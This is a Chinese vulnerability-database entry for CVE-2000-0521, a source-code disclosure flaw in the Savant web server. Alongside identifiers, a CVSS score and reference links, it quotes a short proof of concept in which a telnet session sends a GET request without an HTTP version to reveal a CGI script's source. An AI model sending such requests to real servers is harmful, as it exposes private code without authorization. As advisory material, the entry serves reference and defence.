Savant web服务器源代码读取漏洞

Savant web服务器源代码读取漏洞

漏洞ID 1105873 漏洞类型 未知
发布时间 2000-06-05 更新时间 2005-05-02
图片[1]-Savant web服务器源代码读取漏洞-安全小百科CVE编号 CVE-2000-0521
图片[2]-Savant web服务器源代码读取漏洞-安全小百科CNNVD-ID CNNVD-200006-014
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19995
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-014
|漏洞详情
Savantweb服务器存在漏洞。远程攻击者借助包括HTTP版本号的GET请求可以读取源代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/1313/info

Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script. 

telnet target 80

GET /cgi-bin/script.xyz HTTP/1.0
<proper script execution/output>

GET /cgi-bin/script.xyz
<source code displayed>
|参考资料

来源:BID
名称:1313
链接:http://www.securityfocus.com/bid/1313
来源:BUGTRAQ
名称:20000605MDMAAdvisory#5:ReadingofCGIScriptsunderSavantWebserver
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0469.html
来源:XF
名称:savant-source-read
链接:http://xforce.iss.net/static/4616.php

相关推荐: MacOS X SoftwareUpdate Arbitrary Package Installation Vulnerability

MacOS X SoftwareUpdate Arbitrary Package Installation Vulnerability 漏洞ID 1101828 漏洞类型 Design Error 发布时间 2002-07-08 更新时间 2002-07-08…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享